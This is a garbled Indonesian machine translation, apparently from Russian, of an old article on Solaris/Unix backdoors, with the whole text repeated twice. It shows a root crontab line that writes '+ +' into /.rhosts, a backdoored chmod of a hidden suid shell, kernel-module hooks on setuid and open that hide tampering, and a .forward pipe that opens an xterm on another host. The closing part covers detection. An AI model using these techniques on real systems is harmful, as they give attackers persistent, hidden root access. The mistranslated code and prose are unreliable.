Dead komputer - komputer yang dilindungi "!
Pendahuluan Mm.
dan membuatnya hak istimewa root itu setengah pertempuran. Seperti dalam
game terkenal "Raja gunung, memenangkan perlu terus. Untuk tujuan ini, sistem yang dibuat
perubahan kecil, kiri program. Ini adalah backdoors. Untuk menemukan mereka di
saya sistem (Dan bagaimana jika mereka sudah ada di sana ;-),? Anda harus memahami bagaimana mereka
penciptaan. Dalam dokumen ini saya tidak berpura-pura menggambarkan semua backdoors mungkin. Anda
dapat menawarkan cara untuk melengkapi koleksi anda. Semua nama mengacu pada OS
Solaris. Dalam sistem * NIX lainnya, mereka serupa.
Klasifikasi.
Backdoors, memberikan hak istimewa.
Mengubah atribut file.
suid-bit (04.000). Ketika Anda mulai memiliki bit s dari sistem menghasilkan proses dengan
uid uid efektif dari pemilik program. Jadi, salinan shell, berbaring di
direktori remote dan memiliki sedikit-lengket, memberikan hukum instan dari file host
seperti sebagai root.
Atribut adalah perangkat khusus.
/ Dev / mem menunjuk ke driver untuk mengakses memori. Pernyataan itu atribut, 0666
memungkinkan pengguna untuk menulis secara langsung ke memori. Seorang penyerang dapat menemukan proc_t
struktur proses dan mengubah uid efektif. {Kmem_thief}
Mengubah file sistem.
/ Var / spool / cron / crontab / Cron menciptakan memerintahkan proses dalam waktu yang ditetapkan.
Seorang penyerang bisa menambahkan baris yang diciptakan, misalnya, file rhosts di tengah malam. dan
menghancurkan itu di pagi hari untuk mengajukan root tugas.
/ Var / spool / cron / crontab / root:
0 22 * * 6 "echo '+ +'> /. Rhosts"
0 6 * * 1 "rm-rf /. Rhosts"
/ Etc / passwd, / etc / shadow - informasi file ini menyimpan sekitar akun. Pencuri
bisa dobavt mereka catatan mereka atau mengubah atribut file-file untuk dimasukkan ke dalam
sewenang-wenang saat informasi yang ada.
/ Var / SADM / install / isi - file ini berisi informasi tentang Terpasang di
sistem file, ukuran mereka, atribut, dan checksum. File ini bisa diubah
untuk menyembunyikan program modifikasi.
Substitusi program, perpustakaan modifikasi.
Program dengan sedikit-lengket atau yang biasa dilakukan oleh administrator sistem dapat
dimodifikasi untuk melakukan perubahan pada sistem ketika administrator. Misalnya:
....
if (geteuid ()!)
chmod ("/ var / tmp / hidden_shell.", 0x4555);
....
Sepotong serupa dapat disisipkan ke dalam sebuah perpustakaan tunggal, seperti libc. Perpustakaan
libc.a dipecah menjadi file objek. Diperlukan fungsi dimodifikasi dan
menyusun DLL baru.
Menambahkan modul untuk kernel.
Seorang penyerang dapat menambahkan modul ke dalam kernel dan mencegat salah satu sistem
panggilan, mengatakan, SYS_setuid.
SYS_setuid Solaris 2.6
....
proc_t p;
user_t ut;
int my_setuid (e_uid_initial uid)
{
int rval;
p = ttoproc (curthread);
mutex_enter (& p_lock p->);
atas = prumap (p);
rval = bcmp (u_comm up->, "setan", 5);
(Void) prunmap (p);
mutex_exit (& p_lock p->);
if (rval) {
rval = setuid (uid);
} Else {
...
}
return 0;
}
....
Sekarang cukup untuk mengubah nama programnya dan panggilan * setan setuid untuk
uid = 0.
Khususnya meninggalkan program.
Sistem ini dapat file octavleny seperti kerupuk passwd, mengeksploitasi untuk suid
program, dll Pada sistem non ditambal dengan exploitov dapat diperoleh akar
hak istimewa pada biaya eksekusi kode di tumpukan program dengan lengket-bit.
Backdoors, memberikan akses ke sistem.
Pengenalan hubungan terpercaya
~ User /. Rhosts, / etc / host.equiv, ~ user / shosts (selama SSH). Semua file
menciptakan hubungan yang dipercaya dalam jaringan. Mereka menyebutnya setan in.rlogind, in.rshd,
sshd, dll File-file yang ditentukan sepasang komputer user yang bisa login
skema autenfikatsii melewati sistem. Pasangan '+ +' memungkinkan setiap pengguna dengan
setiap komputer tanpa password. Kehadiran file / rhosts. {+ +} Memberikan kesempatan
login sebagai root atau smtp (uid = 0, gid = 0). Pembatasan pada login user
hanya root dari konsol tidak mencegah pengguna smtp login terpencil,
/ Usr / bin /. Rhosts memberikan masukan untuk 'bin' pengguna
~ User /. Maju File ini berisi informasi untuk meneruskan mail. Hal ini dapat
terlihat seperti ini:
\ Pengguna
| "/ Usr / openwin / bin / xterm-display another.host.net: 0
Penambahan atau modifikasi dari setan.
Sistem daemon biasanya dimulai pada saat startup sistem dari / etc / rc. D? / file atau
menggunakan inetd meta-daemon. File-file ini dapat ditambahkan untuk memulai setan nya. Untuk
kesulitan mendeteksi koneksi yang tidak sah dengan mendengarkan di jaringan, atau penipuan
firewalla asing untuk program dapat menggunakan UDP, atau paket ICMP.
Backdoors, aktivitas sistem mask tersebut.
Substitusi program.
Penggantian versi program ditambal digunakan untuk menyamarkan pekerjaan mereka di
sistem, misalnya, mulai password lomalki. Program bervariasi sehingga tidak akan
menunjukkan aktivitas pengguna tertentu, menjalankan proses mereka,
penggunaan disk space. Yang paling terkenal dari paket perangkat lunak untuk
penggantian utilitas sistem rootkit. {Rootkit SunOS, Rootkit Linux}
Pengenalan modul ke dalam kernel.
Modul dapat mencegat panggilan sistem untuk mengakses file, informasi tentang
sistem dan sengaja mendistorsi informasi. Misalnya, ketika membuka file
"/ Dll / inetd.conf" akan membuka cadangan dari file ini di tersembunyi
sistem. Jadi menyembunyikan perubahan file sistem. SYS_open:
SYS_open Solaris 2.6
...
char statis new_path = "/ var / tmp / mengunci / idx / inetd.conf..";
int my_open (* FNAME char, int fmode, cmode int)
{
int rval;
rval = bcmp (FNAME, "/ etc / inetd.conf", 16);
if (rval) {
kembali (copen (FNAME, (int) (fmode-fopen), cmode));
} Else {
kembali (copen (new_path, (int) (fmode-fopen), cmode));
}
}
...
Penentuan backdoors.
backdoor Yah-tersembunyi agak sulit untuk menemukan. Cari pertanyaan dan backdoors menciptakan
mengingatkan tentang "sengketa baju besi dan kerang."
Memeriksa file.
solusi yang wajar adalah dengan membuat daftar nazavisimy file sistem dengan atribut mereka
dan checksum. Daftar ini dibuat setelah instalasi sistem baru dan
menyesuaikan itu dengan Aset (SUNWast) atau 'fix-mode' oleh Casper Dik. Memeriksa
file dalam sistem dapat dilakukan oleh cron job atau proses yang berkelanjutan yang rendah
prioritas. checksum ini dihitung / bin / jumlah bukanlah jaminan dapat diandalkan
keamanan, karena mudah cocok. Anda dapat porekomedovat untuk tujuan MD5 ini.
Ada sejumlah produk dari perusahaan yang berbeda, memungkinkan Anda untuk melihat sistem
"Aneh" tanggal file, atribut.
Kontrol atas koneksi jaringan.
Pelajari tentang akses tidak sah ke sistem mungkin mengendalikan lalu lintas jaringan dan skanniruya
host untuk port terbuka. Ada banyak scanner serta
sistem pemantauan lalu lintas jaringan. Solusi terbaik adalah selalu ;-) firewall.
Mempertahankan sistem secara wajar.
System dengan semua patch terpasang, layanan yang tidak terpakai menonaktifkan
signifikan lebih rentan terhadap patah tulang, dengan keyakinan ;-) cukup terbatas
Pendahuluan Mm.
dan membuatnya hak istimewa root itu setengah pertempuran. Seperti dalam
game terkenal "Raja gunung, memenangkan perlu terus. Untuk tujuan ini, sistem yang dibuat
perubahan kecil, kiri program. Ini adalah backdoors. Untuk menemukan mereka di
saya sistem (Dan bagaimana jika mereka sudah ada di sana ;-),? Anda harus memahami bagaimana mereka
penciptaan. Dalam dokumen ini saya tidak berpura-pura menggambarkan semua backdoors mungkin. Anda
dapat menawarkan cara untuk melengkapi koleksi anda. Semua nama mengacu pada OS
Solaris. Dalam sistem * NIX lainnya, mereka serupa.
Klasifikasi.
Backdoors, memberikan hak istimewa.
Mengubah atribut file.
suid-bit (04.000). Ketika Anda mulai memiliki bit s dari sistem menghasilkan proses dengan
uid uid efektif dari pemilik program. Jadi, salinan shell, berbaring di
direktori remote dan memiliki sedikit-lengket, memberikan hukum instan dari file host
seperti sebagai root.
Atribut adalah perangkat khusus.
/ Dev / mem menunjuk ke driver untuk mengakses memori. Pernyataan itu atribut, 0666
memungkinkan pengguna untuk menulis secara langsung ke memori. Seorang penyerang dapat menemukan proc_t
struktur proses dan mengubah uid efektif. {Kmem_thief}
Mengubah file sistem.
/ Var / spool / cron / crontab / Cron menciptakan memerintahkan proses dalam waktu yang ditetapkan.
Seorang penyerang bisa menambahkan baris yang diciptakan, misalnya, file rhosts di tengah malam. dan
menghancurkan itu di pagi hari untuk mengajukan root tugas.
/ Var / spool / cron / crontab / root:
0 22 * * 6 "echo '+ +'> /. Rhosts"
0 6 * * 1 "rm-rf /. Rhosts"
/ Etc / passwd, / etc / shadow - informasi file ini menyimpan sekitar akun. Pencuri
bisa dobavt mereka catatan mereka atau mengubah atribut file-file untuk dimasukkan ke dalam
sewenang-wenang saat informasi yang ada.
/ Var / SADM / install / isi - file ini berisi informasi tentang Terpasang di
sistem file, ukuran mereka, atribut, dan checksum. File ini bisa diubah
untuk menyembunyikan program modifikasi.
Substitusi program, perpustakaan modifikasi.
Program dengan sedikit-lengket atau yang biasa dilakukan oleh administrator sistem dapat
dimodifikasi untuk melakukan perubahan pada sistem ketika administrator. Misalnya:
....
if (geteuid ()!)
chmod ("/ var / tmp / hidden_shell.", 0x4555);
....
Sepotong serupa dapat disisipkan ke dalam sebuah perpustakaan tunggal, seperti libc. Perpustakaan
libc.a dipecah menjadi file objek. Diperlukan fungsi dimodifikasi dan
menyusun DLL baru.
Menambahkan modul untuk kernel.
Seorang penyerang dapat menambahkan modul ke dalam kernel dan mencegat salah satu sistem
panggilan, mengatakan, SYS_setuid.
SYS_setuid Solaris 2.6
....
proc_t p;
user_t ut;
int my_setuid (e_uid_initial uid)
{
int rval;
p = ttoproc (curthread);
mutex_enter (& p_lock p->);
atas = prumap (p);
rval = bcmp (u_comm up->, "setan", 5);
(Void) prunmap (p);
mutex_exit (& p_lock p->);
if (rval) {
rval = setuid (uid);
} Else {
...
}
return 0;
}
....
Sekarang cukup untuk mengubah nama programnya dan panggilan * setan setuid untuk
uid = 0.
Khususnya meninggalkan program.
Sistem ini dapat file octavleny seperti kerupuk passwd, mengeksploitasi untuk suid
program, dll Pada sistem non ditambal dengan exploitov dapat diperoleh akar
hak istimewa pada biaya eksekusi kode di tumpukan program dengan lengket-bit.
Backdoors, memberikan akses ke sistem.
Pengenalan hubungan terpercaya
~ User /. Rhosts, / etc / host.equiv, ~ user / shosts (selama SSH). Semua file
menciptakan hubungan yang dipercaya dalam jaringan. Mereka menyebutnya setan in.rlogind, in.rshd,
sshd, dll File-file yang ditentukan sepasang komputer user yang bisa login
skema autenfikatsii melewati sistem. Pasangan '+ +' memungkinkan setiap pengguna dengan
setiap komputer tanpa password. Kehadiran file / rhosts. {+ +} Memberikan kesempatan
login sebagai root atau smtp (uid = 0, gid = 0). Pembatasan pada login user
hanya root dari konsol tidak mencegah pengguna smtp login terpencil,
/ Usr / bin /. Rhosts memberikan masukan untuk 'bin' pengguna
~ User /. Maju File ini berisi informasi untuk meneruskan mail. Hal ini dapat
terlihat seperti ini:
\ Pengguna
| "/ Usr / openwin / bin / xterm-display another.host.net: 0
Penambahan atau modifikasi dari setan.
Sistem daemon biasanya dimulai pada saat startup sistem dari / etc / rc. D? / file atau
menggunakan inetd meta-daemon. File-file ini dapat ditambahkan untuk memulai setan nya. Untuk
kesulitan mendeteksi koneksi yang tidak sah dengan mendengarkan di jaringan, atau penipuan
firewalla asing untuk program dapat menggunakan UDP, atau paket ICMP.
Backdoors, aktivitas sistem mask tersebut.
Substitusi program.
Penggantian versi program ditambal digunakan untuk menyamarkan pekerjaan mereka di
sistem, misalnya, mulai password lomalki. Program bervariasi sehingga tidak akan
menunjukkan aktivitas pengguna tertentu, menjalankan proses mereka,
penggunaan disk space. Yang paling terkenal dari paket perangkat lunak untuk
penggantian utilitas sistem rootkit. {Rootkit SunOS, Rootkit Linux}
Pengenalan modul ke dalam kernel.
Modul dapat mencegat panggilan sistem untuk mengakses file, informasi tentang
sistem dan sengaja mendistorsi informasi. Misalnya, ketika membuka file
"/ Dll / inetd.conf" akan membuka cadangan dari file ini di tersembunyi
sistem. Jadi menyembunyikan perubahan file sistem. SYS_open:
SYS_open Solaris 2.6
...
char statis new_path = "/ var / tmp / mengunci / idx / inetd.conf..";
int my_open (* FNAME char, int fmode, cmode int)
{
int rval;
rval = bcmp (FNAME, "/ etc / inetd.conf", 16);
if (rval) {
kembali (copen (FNAME, (int) (fmode-fopen), cmode));
} Else {
kembali (copen (new_path, (int) (fmode-fopen), cmode));
}
}
...
Penentuan backdoors.
backdoor Yah-tersembunyi agak sulit untuk menemukan. Cari pertanyaan dan backdoors menciptakan
mengingatkan tentang "sengketa baju besi dan kerang."
Memeriksa file.
solusi yang wajar adalah dengan membuat daftar nazavisimy file sistem dengan atribut mereka
dan checksum. Daftar ini dibuat setelah instalasi sistem baru dan
menyesuaikan itu dengan Aset (SUNWast) atau 'fix-mode' oleh Casper Dik. Memeriksa
file dalam sistem dapat dilakukan oleh cron job atau proses yang berkelanjutan yang rendah
prioritas. checksum ini dihitung / bin / jumlah bukanlah jaminan dapat diandalkan
keamanan, karena mudah cocok. Anda dapat porekomedovat untuk tujuan MD5 ini.
Ada sejumlah produk dari perusahaan yang berbeda, memungkinkan Anda untuk melihat sistem
"Aneh" tanggal file, atribut.
Kontrol atas koneksi jaringan.
Pelajari tentang akses tidak sah ke sistem mungkin mengendalikan lalu lintas jaringan dan skanniruya
host untuk port terbuka. Ada banyak scanner serta
sistem pemantauan lalu lintas jaringan. Solusi terbaik adalah selalu ;-) firewall.
Mempertahankan sistem secara wajar.
System dengan semua patch terpasang, layanan yang tidak terpakai menonaktifkan
signifikan lebih rentan terhadap patah tulang, dengan keyakinan ;-) cukup terbatas
